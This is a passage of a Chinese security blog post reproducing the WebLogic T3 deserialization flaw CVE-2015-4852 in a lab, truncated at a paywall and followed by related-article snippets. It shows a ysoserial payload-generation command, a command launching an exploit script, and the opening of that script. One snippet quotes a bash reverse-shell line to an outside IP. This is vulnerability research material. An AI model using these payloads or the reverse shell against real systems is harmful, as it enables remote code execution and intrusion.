WebLogic基于T3协议的反序列化之CVE-2015-4852

最新推荐文章于 2025-03-17 17:57:52 发布
最新推荐文章于 2025-03-17 17:57:52 发布
阅读量3.8k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: java安全 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122743146

前言

WebLogic 中的反序列化漏洞可以分为两种,第一种为基于 T3 协议的反序列化,第二种为基于 XML 的反序列化,下面表格为大概 CVE 分布,在基于 T3 的反序列化漏洞中,很多是基于 CVE-2015-4582 漏洞的一个相关绕过,而对 CVE-2015-4582 漏洞的绕过又大体应该分为两类,下面对 CVE-2015-4582 进行调试分析,为后面的绕过打下基础。

基于 T3 CVE-2015-4582 CVE-2016-0638 CVE-2016-3510 CVE-2018-2628 CVE-2020-2555 CVE-2020-2883
基于 XML CVE-2017-3506 CVE-2017-10271 CVE-2019-2729

漏洞调试环境

WebLogic 系列的漏洞可以用到 Github 上的一个项目 :https://github.com/QAX-A-Team/WeblogicEnvironment

环境搭建参考以下两篇文章即可:

https://www.cnblogs.com/0x7e/p/14529949.html#0x01%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA
https://www.cnblogs.com/nice0e3/p/14201884.html#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA

漏洞复现

ysoserial 生成反序列化文件

java -jar ysoserial.jar CommonsCollections1 "touch /poc.txt" > payload.tmp

利用 poc 直接打反序列化文件过去

python2 cve-2015-4852.py 192.168.134.133 7001 D:\payload.ser

cve-2015-4852.py

#!/usr/bin/python
import socket
import struct
import sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers
最低0.47元/天 解锁文章

200万优质内容无限畅学
Java反序列化(之)Weblogic反序列化系列初探 CVE-2015-4852
Vicl1fe的博客
03-24 1614
前言 weblogic反序列化主要有XMLDecoder和T3协议。先从T3协议开始,主要是CVE-2015-4852这个漏洞 环境搭建 https://blog.csdn.net/qq_41918771/article/details/117467957 https://blog.csdn.net/weixin_45682070/article/details/123230456 主要参考这两篇文章,第一篇是我写的,但是由于源不能用了原因,可以参考第二篇 T3协议 T3概述 RMI通信使用的是序列化数
weblogic之T3反序列化
weixin_45682070的博客
03-02 2127
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
weblogic漏洞初探之CVE-2015-4852
洋洋的小黑屋
08-13 846
weblogic漏洞初探之CVE-2015-4852 一、环境搭建 1. 搭建docker 这里用了vulhub的环境进行修改:https://vulhub.org/ 新建个文件夹,创建两个文件docker-compose.yml、DockerFile docker-compose.yml: version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" -
CVE-2015-4852 Weblogic T3 反序列化分析
YJ_12340的博客
12-15 496
看到很多师傅的面经里面都有提到 Weblogic 这一个漏洞,最近正好有一些闲暇时间,可以看一看。因为环境上总是有一些小问题,所以会在本地和云服务器切换着调试。
weblogic-T3反序列化
weixin_48776804的博客
05-11 1225
weblogic-T3反序列化
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 7027
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
WebLogic反序列化CVE-2015-4852CVE-2016-0638、CVE-2016-3510
qq_40710190的博客
07-14 935
weblogic3个基础cve
WebLogic基于T3协议反序列化 CVE-2016-0638/CVE-2016-3510
01-29 5438
WebLogic基于T3协议反序列化 CVE-2016-0638/CVE-2016-3510 CVE-2016-0638 是前面分析的 CVE-2015-4852 的一个绕过,通过找到一个不在黑名单中的类,且这个类存在readObject/readResolve/readExternal 方法,并且恰好这些方法里面有一些数据进行反序列化操作,那么这时我们就可以把原生的序列化数据封装到这个类里面,通过调用反序列化对象重写的readObject/readResolve/readExternal 方法这一特点来
weblogic 反序列化CVE-2020-2883
qq_52579508的博客
08-31 950
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。“bash -i >& /dev/tcp/172.18.52.33/11111 0>&1” 这一段是需要进行编译的。前面是的 nc 监听 一直出问题 我的 监听ip 出错了 所以一直错 一直监听不到。后面换了windows 使用子系统去运行 poc poc 应该没问题 可能是 监听问题。用的kali 监听 很慢 一直返回不了 shell。
Weblogic漏洞Java反序列化CVE-2015-4852解析
simonnews的博客
05-04 5520
weblogic系列_Java反序列化_CVE-2015-4852 1:概述1.1:官方概述1.2:漏洞概述2:漏洞原理分析2.1:基本概念2.1欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也...
Weblogic T3 反序列化学习
qq_31065143的博客
08-03 740
Weblogic T3 反序列化学习 前言 最近在公司实习也没有太多事情,就来学习一下Weblogic听好多师傅讲过很多次了。 这里我使用的是ATEAM大哥开源的搭建工具,感谢前人提供的便捷。我这里本来打算在自己电脑上搭建,但是说多了都是泪,m1适配问题。。。。最后还是跑云服务器上进行了搭建。 搭建过程 下载文件 先从GitHub上面拉取项目,拉取之后创建两个文件夹jdks,weblogics。 jdk下载地址: https://www.oracle.com/technetwork/java/javas
weblogic反序列化之T3协议
snowlyzz的博客
01-16 3496
T3反序列化学习
CVE重要漏洞复现之Weblogic_T3反序列化漏洞
没有网络安全就没有国家安全
03-17 1478
CVE重要漏洞复现之Weblogic_T3反序列化漏洞
CVE-2015-4852 java 反序列化漏洞--weblogic补丁
热门推荐
水滴石穿
01-04 2万+
    CVE-2015-4852 Patch Availability Document for Oracle WebLogic Server Component of Oracle Fusion Middleware (Doc ID 2075927.1) To Bottom APPLIES TO: PeopleSoft Enterprise PT Peo...
weblogicT3协议反序列化复现
san3144393495的博客
04-26 524
Weblogic Server中的RMI 通信使用T3协议Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞weblogic组件的远程代码执行攻击。端口是JRMP Server:是端口。开始构造pyload。进行base64加密。
WebLogic T3反序列化漏洞(CVE-2018-2628)--vulhub
ccc_9wy的博客
12-10 1782
复现CVE-2018-2628漏洞;T3反序列化漏洞weblogic
反序列化_CVE-2016-7124
yyj1781572的博客
12-06 597
反序列化_CVE-2016-7124
CVE-2015-4852复现
最新发布
04-01
CVE-2015-4852 是 Oracle WebLogic Server 中的一个反序列化漏洞,攻击者可以通过发送特制的数据包来触发该漏洞并实现远程代码执行。此漏洞的根本原因在于 Java 序列化的不安全使用[^4]。 --- ### 复现 CVE-2015-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值